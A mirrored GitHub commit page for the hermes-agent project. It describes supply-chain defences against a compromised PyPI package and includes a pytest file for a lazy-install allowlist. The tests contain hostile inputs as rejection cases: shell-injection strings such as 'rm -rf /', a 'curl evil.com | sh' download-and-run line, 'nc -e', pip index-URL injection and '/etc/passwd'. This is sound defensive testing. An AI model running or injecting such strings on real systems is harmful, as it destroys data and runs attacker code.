mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-05-18 04:41:56 +00:00
* feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback
Three coordinated mitigations for the Mini Shai-Hulud worm hitting
mistralai 2.4.6 on PyPI (2026-05-12) and for the next single-package
compromise that follows.
# What this PR makes true
1. Users with the poisoned mistralai 2.4.6 in their venv get a loud
detection banner with copy-pasteable remediation steps the moment
they run hermes (and on every gateway startup).
2. One quarantined / yanked PyPI package can no longer silently demote
a fresh install to 'core only' — the installer keeps every other
extra and tells the user which tier landed.
3. Future opt-in backends (Mistral, ElevenLabs, Honcho, etc.) can
lazy-install on first use under a strict allowlist, instead of
eagerly pulling everything at install time.
# Detection: hermes_cli/security_advisories.py
- ADVISORIES catalog (one entry currently: shai-hulud-2026-05 for
mistralai==2.4.6). Adding the next one is a single dataclass.
- detect_compromised() uses importlib.metadata.version() — no pip
dependency, works in uv venvs that lack pip.
- Banner cache (~/.hermes/cache/advisory_banner_seen) rate-limits
the startup banner to once per 24h per advisory.
- Acks persisted to security.acked_advisories in config.yaml; never
re-banner after ack.
- Wired into:
* hermes doctor — runs first, prints full remediation block
* hermes doctor --ack <id> — dismisses an advisory
* cli.py interactive run() and single-query branches — short
stderr banner pointing at hermes doctor
* gateway/run.py startup — operator-visible warning in gateway.log
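The detection step described above can be sketched roughly as follows. This is a minimal illustration, not the shipped module: the `Advisory` field names and the injectable `get_version` parameter are assumptions made for the example, and only `importlib.metadata.version()` and the advisory ID and version come from the notes above.

```python
from dataclasses import dataclass
from importlib import metadata
from typing import Callable, FrozenSet, List, Sequence


@dataclass(frozen=True)
class Advisory:
    # Field names are illustrative assumptions, not the shipped schema.
    advisory_id: str
    package: str
    bad_versions: FrozenSet[str]


ADVISORIES = (
    Advisory("shai-hulud-2026-05", "mistralai", frozenset({"2.4.6"})),
)


def detect_compromised(
    advisories: Sequence[Advisory] = ADVISORIES,
    get_version: Callable[[str], str] = metadata.version,
) -> List[Advisory]:
    """Return advisories whose package is installed at a known-bad version."""
    hits = []
    for adv in advisories:
        try:
            installed = get_version(adv.package)
        except metadata.PackageNotFoundError:
            continue  # package is not installed, so nothing to flag
        if installed in adv.bad_versions:
            hits.append(adv)
    return hits
```

Because the lookup goes through package metadata rather than a `pip` subprocess, the same check works in a venv that has no pip at all.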
# Lazy-install framework: tools/lazy_deps.py
- LAZY_DEPS allowlist maps namespaced feature keys (tts.elevenlabs,
memory.honcho, provider.bedrock, etc.) to pip specs.
- ensure(feature) installs missing deps in the active venv via the
uv → pip → ensurepip ladder (matches tools_config._pip_install).
- Strict spec safety regex rejects URLs, file paths, shell metas,
pip flag injection, control chars — only PyPI-by-name accepted.
- Gated on security.allow_lazy_installs (default true) plus the
HERMES_DISABLE_LAZY_INSTALLS env var for restricted/audited envs.
- Migrated three backends as proof of pattern:
* tools/tts_tool.py — _import_elevenlabs() calls ensure first
* plugins/memory/honcho/client.py — get_honcho_client lazy-installs
* tts.mistral / stt.mistral entries pre-registered for when PyPI
restores mistralai
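A rough sketch of how the allowlist, the spec safety check, and the gating could fit together. The regex, the 200-character limit, the accepted env-var values, and the injected `is_satisfied` / `install` / `load_config` callables are assumptions for illustration; the real `ensure()` has a different signature and installs through the uv → pip → ensurepip ladder.

```python
import os
import re

# Assumed pattern: PyPI name, optional extras, optional comma-separated
# version clauses. Anything else (URLs, paths, flags, whitespace) fails.
_OP = r"(?:==|~=|>=|<=|!=|<|>)"
_SAFE_SPEC = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._-]*"        # project name
    r"(?:\[[A-Za-z0-9._,-]+\])?"         # optional [extras]
    rf"(?:{_OP}[A-Za-z0-9.*+]+(?:,{_OP}[A-Za-z0-9.*+]+)*)?"
)

# Illustrative allowlist entry; the spec is taken from the test file.
LAZY_DEPS = {"tts.elevenlabs": ("elevenlabs>=1.0,<2",)}


class FeatureUnavailable(RuntimeError):
    pass


def spec_is_safe(spec: str) -> bool:
    return 0 < len(spec) <= 200 and _SAFE_SPEC.fullmatch(spec) is not None


def allow_lazy_installs(load_config, env=os.environ) -> bool:
    """Env var wins; an unreadable config fails open (installs allowed)."""
    flag = env.get("HERMES_DISABLE_LAZY_INSTALLS", "").strip().lower()
    if flag in {"1", "true", "yes"}:
        return False
    try:
        security = load_config().get("security", {})
    except Exception:
        return True
    return bool(security.get("allow_lazy_installs", True))


def ensure(feature, is_satisfied, install, allowed=True) -> None:
    specs = LAZY_DEPS.get(feature)
    if specs is None:
        raise FeatureUnavailable(f"{feature!r} is not in LAZY_DEPS")
    missing = [s for s in specs if not is_satisfied(s)]
    if not missing:
        return  # already installed, never touch the installer
    if not allowed:
        raise FeatureUnavailable("lazy installs disabled")
    if not all(spec_is_safe(s) for s in missing):
        raise FeatureUnavailable("spec failed the safety check")
    install(missing)
    if not all(is_satisfied(s) for s in missing):
        raise FeatureUnavailable("install reported success but package is still missing")
```

Using `fullmatch` rather than `match` with `$` matters here: `$` would accept a trailing newline, which is one of the inputs the safety check is meant to reject.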
# Installer fallback tiers
scripts/install.sh, scripts/install.ps1, setup-hermes.sh:
- Centralised _BROKEN_EXTRAS list (currently: mistral). Edit one
array when a transitive breaks; users keep every other extra.
- New 'all minus known-broken' tier between [all] and the existing
PyPI-only-extras tier. Only kicks in when [all] fails to resolve.
- All three tiers explicit: every fallback announces which tier
landed and prints a re-run hint when not on Tier 1.
- install.ps1 and install.sh both regenerate their tier specs from
the same _BROKEN_EXTRAS array so updates stay in sync.
Side effect: install.ps1 Tier 2 spec previously hardcoded 'mistral'
in its extra list — bug fixed by the refactor (mistral is filtered
out).
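The tier cascade can be modelled in a few lines. The real logic lives in shell and PowerShell; the Python below is only a sketch of the idea, with hypothetical extra names, tier labels, and an injected `try_install` callable standing in for the actual install command. Whether the third tier is filtered through the broken list is also an assumption.

```python
from typing import Callable, List, Sequence, Tuple


def build_tiers(
    all_extras: Sequence[str],
    pypi_only_extras: Sequence[str],
    broken: Sequence[str],
) -> List[Tuple[str, str]]:
    """Derive every fallback spec from one broken-extras list."""

    def spec(extras: Sequence[str]) -> str:
        kept = [e for e in extras if e not in broken]
        return ".[" + ",".join(kept) + "]" if kept else "."

    return [
        ("Tier 1: [all]", ".[all]"),
        ("Tier 2: all minus known-broken", spec(all_extras)),
        ("Tier 3: PyPI-only extras", spec(pypi_only_extras)),
    ]


def install_with_fallback(
    tiers: Sequence[Tuple[str, str]],
    try_install: Callable[[str], bool],
) -> str:
    """Try each tier in order and report which one landed."""
    for label, target in tiers:
        if try_install(target):
            return label
    raise RuntimeError("every install tier failed")
```

For example, with hypothetical extras `["voice", "mistral", "honcho"]` and `broken=["mistral"]`, the second tier's spec is `.[voice,honcho]`, so a failed `[all]` resolve costs the user only the broken extra.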
# Config
hermes_cli/config.py — DEFAULT_CONFIG.security gains:
- acked_advisories: [] (advisory IDs the user has dismissed)
- allow_lazy_installs: True (security gate for ensure())
No config version bump needed — both keys nest under existing
security: block, and load_config's deep-merge picks up DEFAULT_CONFIG
defaults for users with older configs.
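Why no version bump is needed can be seen from a generic deep-merge. The function below is a sketch of the usual technique, not the actual `load_config` code, and `some_existing_key` is a made-up key standing in for whatever an older config already has under `security:`.

```python
import copy


def deep_merge(defaults: dict, user: dict) -> dict:
    """Overlay user values on defaults, recursing into nested dicts."""
    merged = copy.deepcopy(defaults)
    for key, value in user.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = copy.deepcopy(value)
    return merged


DEFAULT_CONFIG = {
    "security": {"acked_advisories": [], "allow_lazy_installs": True},
}

# An older user config that predates the two new keys (hypothetical content).
old_user_config = {"security": {"some_existing_key": "x"}}

merged = deep_merge(DEFAULT_CONFIG, old_user_config)
```

The merged `security` block keeps the user's existing key and gains both new defaults, which is the behaviour the note above relies on.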
# Tests
tests/hermes_cli/test_security_advisories.py — 23 tests covering:
- detect_compromised matches/non-matches, wildcard frozenset
- ack persistence, idempotence, blank rejection, config-failure path
- banner cache rate limiting + 24h re-banner + ack-stops-banner
- short_banner_lines / full_remediation_text / render_doctor_section /
gateway_log_message
- shipped catalog well-formedness invariant
tests/tools/test_lazy_deps.py — 40 tests covering:
- spec safety: 11 safe parametrized + 18 unsafe parametrized
- allowlist: unknown-feature rejection, namespace.name shape,
every shipped spec passes the safety regex
- security gating: config flag, env var, default, fail-open
- ensure() happy/sad paths: already-satisfied, install success,
pip stderr surfaced on failure, install-succeeds-but-still-missing
- is_available, feature_install_command
Combined: 63 new tests, all passing under scripts/run_tests.sh.
# Validation
- scripts/run_tests.sh tests/hermes_cli/test_security_advisories.py
tests/tools/test_lazy_deps.py → 63/63 passing
- scripts/run_tests.sh tests/hermes_cli/test_doctor.py
tests/hermes_cli/test_doctor_command_install.py
tests/tools/test_tts_mistral.py tests/tools/test_transcription_tools.py
tests/tools/test_transcription_dotenv_fallback.py → 165/165 passing
- scripts/run_tests.sh tests/hermes_cli/ tests/tools/ →
9191 passed, 8 pre-existing failures (verified on origin/main
before this change)
- bash -n on install.sh and setup-hermes.sh → OK
- py_compile on all modified .py files → OK
- End-to-end smoke test of detect_compromised + render_doctor_section
+ gateway_log_message with mocked installed version → produces
copy-pasteable remediation output
# Community
Full advisory + remediation steps:
website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
Short-form post drafts (Discord, GitHub pinned issue, README banner):
scripts/community-announcement-shai-hulud.md
Refs: PR #24205 (mistral disabled), Socket Security advisory
<https://socket.dev/blog/mini-shai-hulud-worm-pypi>
* build(deps): pin every direct dep to ==X.Y.Z (no ranges)
Companion to the supply-chain advisory work: replace every >=/</~= range
in pyproject.toml's [project.dependencies] and [project.optional-dependencies]
with an exact ==X.Y.Z pin sourced from uv.lock.
Why: ranges allow PyPI to ship a fresh version of any direct dep at any
time without a code review on our side. With ranges, the malicious
mistralai 2.4.6 release would have been pulled by every fresh
'pip install -e .[all]' for the hours between upload and PyPI's
quarantine — exactly the install window we got hit on. Exact pins close
that window: the only way a new package version reaches a user is via
an intentional update on our end.
What the user-facing change is: nothing, behavior-wise. Every package
resolves to the same version it was already resolving to via uv.lock —
the pins just remove the resolver's freedom to pick a different one.
Cost: any user installing Hermes alongside another package that requires
a different version of one of the pinned deps gets a resolver conflict.
Acceptable for our isolated-venv install path; documented in the new
comment block.
Build-system requires line (setuptools>=61.0) is intentionally left
as a range — pinning the build backend would block fresh pip from
bootstrapping the build on architectures where that exact wheel isn't
available.
mistral extra (mistralai==2.3.0) is pinned but stays out of [all]
(per PR #24205). 'uv lock' regeneration will fail until PyPI restores
mistralai; lockfile regeneration is gated behind that, NOT on every PR.
LAZY_DEPS in tools/lazy_deps.py also moved to exact pins so the lazy-
install pathway can never resolve a different version than the one
declared in pyproject.toml.
Validation:
- Cross-checked all 77 pinned direct deps in pyproject.toml against
uv.lock — every pin matches the resolved version exactly.
- Cross-checked all LAZY_DEPS specs against uv.lock — same.
- 'uv pip install -e .[all] --dry-run' resolves 205 packages cleanly.
- tests/tools/test_lazy_deps.py + tests/hermes_cli/test_security_advisories.py
→ 63/63 passing (every shipped spec passes the safety regex).
- Doctor + TTS + transcription targeted suite → 146/146 passing.
* build(deps): hash-verify transitives via uv.lock; remove unresolvable [mistral] extra
You asked: 'what about the dependencies the dependencies rely on?' —
correctly noting that exact-pinning direct deps in pyproject.toml does
NOT cover the transitive graph. `pip install` and `uv pip install` both
re-resolve transitives fresh from PyPI at install time, so a compromised
transitive (e.g. `httpcore` if it got worm-poisoned tomorrow) would
still hit our users even with every direct dep exact-pinned.
# What this commit fixes
1. **Both real installer scripts now prefer `uv sync --locked` as Tier 0.**
uv.lock records SHA256 hashes for every transitive — a compromised
package with a different hash gets REJECTED. Falls through to the
existing `uv pip install` cascade if the lockfile is missing or
stale, with a loud warning that the fallback path does NOT
hash-verify transitives. Previously only `setup-hermes.sh` (the dev
path) used the lockfile; `scripts/install.sh` and `scripts/install.ps1`
(the paths fresh users actually run) skipped it.
2. **Removed the `[mistral]` extra entirely.** The `mistralai` PyPI
project is fully quarantined right now — every version returns 404,
so any pin we wrote was unresolvable, which broke `uv lock --check`
in CI. Restoration is documented in pyproject.toml as a 5-step
checklist (verify, re-add extra, re-enable in 4 modules, regenerate
lock, optionally re-add to [all]).
3. **Regenerated uv.lock.** 262 packages, mistralai/eval-type-backport/
jsonpath-python pruned. `uv lock --check` now passes.
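The Tier 0 behaviour in item 1 amounts to "try the locked path first, warn loudly if it is skipped". The installers implement this in shell and PowerShell; the Python below is only a model of the control flow, with an injectable `run` so it can be exercised without uv installed. The function name, return labels, and warning text are assumptions.

```python
import subprocess
from typing import Callable, Sequence


def run_ok(cmd: Sequence[str]) -> bool:
    """Run a command and report whether it exited with status 0."""
    return subprocess.run(list(cmd), check=False).returncode == 0


def install_hermes(
    run: Callable[[Sequence[str]], bool] = run_ok,
    warn: Callable[[str], None] = print,
) -> str:
    # Tier 0: install exactly what uv.lock records, hashes included.
    if run(["uv", "sync", "--locked"]):
        return "tier0-locked"

    # Lockfile missing or stale: fall through, but say so loudly.
    warn("WARNING: falling back to 'uv pip install'; "
         "transitive dependencies are NOT hash-verified on this path")
    if run(["uv", "pip", "install", "-e", ".[all]"]):
        return "unverified-fallback"
    raise RuntimeError("install failed on every path")
```

Returning a label for the path taken keeps the caller able to print which tier landed, in line with the "every fallback announces which tier" rule from the installer notes.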
# Defense-in-depth view
| Layer                               | Where             | Protects against                            |
|-------------------------------------|-------------------|---------------------------------------------|
| Exact pins in pyproject             | direct deps       | new mistralai 2.4.6-style direct compromise |
| uv.lock + `--locked` install        | transitive graph  | transitive worm injection                   |
| Tier-0 hash-verified path           | install.sh / .ps1 | fresh installs that skip the lockfile       |
| `uv lock --check` CI gate           | every PR          | drift between pyproject and lockfile        |
| `hermes_cli/security_advisories.py` | runtime           | cleanup for users who already got hit       |
The exact pinning + hash verification together close the supply-chain
gap. Without the lockfile path, exact pins alone are theater.
# Validation
- `uv lock --check` → passes (262 packages resolved, no drift).
- `bash -n` on install.sh + setup-hermes.sh → OK.
- 209/209 tests passing across new + adjacent test files
(test_lazy_deps.py, test_security_advisories.py, test_doctor.py,
test_tts_mistral.py, test_transcription_tools.py).
- TOML parse OK.
* chore: remove community announcement drafts (PR body covers it)
* build(deps): lazy-install every opt-in backend (anthropic, search, terminal, platforms, dashboard)
Extends the lazy-install framework to cover everything that's not used by
every hermes session. Base install drops from ~60 packages to 45.
Moved out of the core dependencies list in pyproject.toml:
- anthropic (only when provider=anthropic native, not via aggregators)
- exa-py, firecrawl-py, parallel-web (search backends; only when picked)
- fal-client (image gen; only when picked)
- edge-tts (default TTS but still optional)
New extras in pyproject.toml: [anthropic] [exa] [firecrawl] [parallel-web]
[fal] [edge-tts]. All added to [all].
New LAZY_DEPS entries: provider.anthropic, search.{exa,firecrawl,parallel},
tts.edge, image.fal, memory.hindsight, platform.{telegram,discord,matrix},
terminal.{modal,daytona,vercel}, tool.dashboard.
Each import site now calls ensure() before importing the SDK. Where the
module had a top-level try/except (telegram, discord, fastapi), the
graceful-fallback pattern was extended to lazy-install on first
check_*_requirements() call and re-bind module globals.
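The "lazy-install on first check, then re-bind module globals" pattern might look like the sketch below. It is a stand-alone illustration: `SDK_MODULE` uses the stdlib `json` module as a stand-in for an optional SDK, `_sdk = None` represents what a failed top-level import leaves behind, and `ensure` is passed in rather than imported from `tools.lazy_deps`.

```python
import importlib
from types import ModuleType
from typing import Callable, Optional

SDK_MODULE = "json"  # stand-in for an optional SDK such as a chat platform client

# What a top-level `try: import sdk / except ImportError: sdk = None` leaves
# behind when the package is not installed yet.
_sdk: Optional[ModuleType] = None


def check_requirements(
    ensure: Callable[[str], None],
    feature: str = "platform.telegram",
) -> bool:
    """Return True once the SDK is importable, installing it on first use."""
    global _sdk
    if _sdk is not None:
        return True  # already bound, no install attempt needed
    try:
        ensure(feature)  # may install; raises if disallowed or failed
        _sdk = importlib.import_module(SDK_MODULE)  # re-bind the module global
    except (ImportError, RuntimeError):
        return False
    return True
```

Re-binding the global matters because other functions in the same module reference the SDK by that name; without it they would keep seeing `None` even after a successful install.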
Updated test_windows_native_support.py tzdata check from snapshot
(>=2023.3 literal) to invariant (any version + win32 marker).
Validation:
- Base install: 45 packages (was ~60); 6 newly-extracted packages absent
- uv lock --check: passes (262 packages, no drift)
- 209/209 lazy_deps + advisory + doctor + tts/transcription tests passing
- py_compile clean on all 12 modified modules
228 lines
9 KiB
Python
"""Tests for tools.lazy_deps — the supply-chain-resilient on-demand installer.

The lazy_deps module is the architectural fix for the "one quarantined
package nukes 10 unrelated extras" problem. It exposes ``ensure(feature)``
which only installs from a strict allowlist, refuses anything that looks
like a URL / file path, runs venv-scoped, and respects the
``security.allow_lazy_installs`` config flag.

These tests cover the security boundary and the public API. The real pip
call is mocked — we never actually shell out during unit tests.
"""

from __future__ import annotations

from typing import Iterator

import pytest

import tools.lazy_deps as ld


# ---------------------------------------------------------------------------
# Spec safety
# ---------------------------------------------------------------------------


class TestSpecSafety:
    @pytest.mark.parametrize("spec", [
        "mistralai>=2.3.0,<3",
        "elevenlabs>=1.0,<2",
        "honcho-ai>=2.0.1,<3",
        "boto3>=1.35.0,<2",
        "mautrix[encryption]>=0.20,<1",
        "google-api-python-client>=2.100,<3",
        "youtube-transcript-api>=1.2.0",
        "qrcode>=7.0,<8",
        "package",  # bare name, no version
        "package==1.0.0",
        "package~=1.0",
    ])
    def test_safe_specs_pass(self, spec):
        assert ld._spec_is_safe(spec), f"expected {spec!r} to be safe"

    @pytest.mark.parametrize("spec", [
        # URL-shaped → rejected (no remote origin override allowed)
        "git+https://github.com/foo/bar.git",
        "https://example.com/foo.tar.gz",
        # File path → rejected
        "/etc/passwd",
        "./local-malware",
        "../escape",
        # Shell metacharacters → rejected
        "package; rm -rf /",
        "package && curl evil.com | sh",
        "package`whoami`",
        "package$(whoami)",
        "package|nc -e",
        # Pip flag injection → rejected
        "--index-url=http://evil/",
        "-r requirements.txt",
        # Whitespace control chars → rejected
        "package\nshell-injection",
        "package\rmore",
        # Empty / overly long → rejected
        "",
        "x" * 500,
    ])
    def test_unsafe_specs_rejected(self, spec):
        assert not ld._spec_is_safe(spec), \
            f"expected {spec!r} to be rejected"


# ---------------------------------------------------------------------------
# Allowlist enforcement
# ---------------------------------------------------------------------------


class TestAllowlist:
    def test_unknown_feature_raises(self, monkeypatch):
        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
        with pytest.raises(ld.FeatureUnavailable, match="not in LAZY_DEPS"):
            ld.ensure("not.a.real.feature")

    def test_lazy_deps_keys_use_namespace_dot_name(self):
        # Sanity check on the data shape — every key should be at least
        # one dot-separated namespace.
        for key in ld.LAZY_DEPS:
            assert "." in key, f"feature {key!r} should be namespace.name"

    def test_every_lazy_dep_spec_passes_safety(self):
        # Defence in depth — even though specs are author-controlled,
        # the safety regex must accept everything we ship.
        for feature, specs in ld.LAZY_DEPS.items():
            for spec in specs:
                assert ld._spec_is_safe(spec), \
                    f"{feature}: spec {spec!r} fails safety check"

    def test_feature_install_command_returns_pip_invocation(self):
        cmd = ld.feature_install_command("memory.honcho")
        assert cmd is not None
        assert cmd.startswith("uv pip install")
        assert "honcho-ai" in cmd

    def test_feature_install_command_unknown(self):
        assert ld.feature_install_command("not.real") is None


# ---------------------------------------------------------------------------
# allow_lazy_installs gating
# ---------------------------------------------------------------------------


class TestSecurityGating:
    def test_disabled_via_config_raises(self, monkeypatch):
        # Pretend honcho is missing AND lazy installs are disabled.
        monkeypatch.setitem(ld.LAZY_DEPS, "test.feat", ("packageX>=1.0,<2",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: False)
        with pytest.raises(ld.FeatureUnavailable, match="lazy installs disabled"):
            ld.ensure("test.feat", prompt=False)

    def test_disabled_via_env_var(self, monkeypatch):
        monkeypatch.setenv("HERMES_DISABLE_LAZY_INSTALLS", "1")
        # Bypass config layer; the env var alone must disable.
        monkeypatch.setattr(
            "hermes_cli.config.load_config",
            lambda: {"security": {"allow_lazy_installs": True}},
        )
        assert ld._allow_lazy_installs() is False

    def test_default_allows(self, monkeypatch):
        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
        monkeypatch.setattr(
            "hermes_cli.config.load_config",
            lambda: {"security": {}},
        )
        assert ld._allow_lazy_installs() is True

    def test_config_failure_fails_open(self, monkeypatch):
        # If config can't be read at all, we ALLOW installs rather than
        # blocking the user out of their own backends.
        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
        monkeypatch.setattr(
            "hermes_cli.config.load_config",
            lambda: (_ for _ in ()).throw(RuntimeError("config broken")),
        )
        assert ld._allow_lazy_installs() is True


# ---------------------------------------------------------------------------
# ensure() happy/sad paths
# ---------------------------------------------------------------------------


class TestEnsure:
    def test_already_satisfied_is_noop(self, monkeypatch):
        # If the package is importable, ensure() returns without calling pip.
        monkeypatch.setitem(ld.LAZY_DEPS, "test.satisfied", ("zzzfake>=1",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
        # If pip were called, this would fail loudly.
        monkeypatch.setattr(
            ld, "_venv_pip_install",
            lambda *a, **kw: pytest.fail("pip should not be called"),
        )
        ld.ensure("test.satisfied", prompt=False)  # no exception

    def test_install_success_path(self, monkeypatch):
        monkeypatch.setitem(ld.LAZY_DEPS, "test.install", ("zzzfake>=1",))
        # First check sees missing, post-install check sees installed.
        call_count = {"n": 0}

        def fake_satisfied(spec):
            call_count["n"] += 1
            return call_count["n"] > 1  # missing first, installed after

        monkeypatch.setattr(ld, "_is_satisfied", fake_satisfied)
        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
        monkeypatch.setattr(
            ld, "_venv_pip_install",
            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
        )
        ld.ensure("test.install", prompt=False)

    def test_install_failure_surfaces_pip_stderr(self, monkeypatch):
        monkeypatch.setitem(ld.LAZY_DEPS, "test.fail", ("zzzfake>=1",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
        monkeypatch.setattr(
            ld, "_venv_pip_install",
            lambda specs, **kw: ld._InstallResult(
                False, "", "ERROR: package not found on PyPI"
            ),
        )
        with pytest.raises(ld.FeatureUnavailable, match="pip install failed"):
            ld.ensure("test.fail", prompt=False)

    def test_install_succeeds_but_still_missing_raises(self, monkeypatch):
        # Pip says success but the package still isn't importable
        # (e.g. site-packages caching, wrong python). Surface this.
        monkeypatch.setitem(ld.LAZY_DEPS, "test.cache", ("zzzfake>=1",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
        monkeypatch.setattr(
            ld, "_venv_pip_install",
            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
        )
        with pytest.raises(ld.FeatureUnavailable, match="still not importable"):
            ld.ensure("test.cache", prompt=False)


# ---------------------------------------------------------------------------
# is_available
# ---------------------------------------------------------------------------


class TestIsAvailable:
    def test_unknown_feature_returns_false(self):
        assert ld.is_available("not.a.thing") is False

    def test_satisfied_returns_true(self, monkeypatch):
        monkeypatch.setitem(ld.LAZY_DEPS, "test.avail", ("zzzfake>=1",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
        assert ld.is_available("test.avail") is True

    def test_missing_returns_false(self, monkeypatch):
        monkeypatch.setitem(ld.LAZY_DEPS, "test.miss", ("zzzfake>=1",))
        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
        assert ld.is_available("test.miss") is False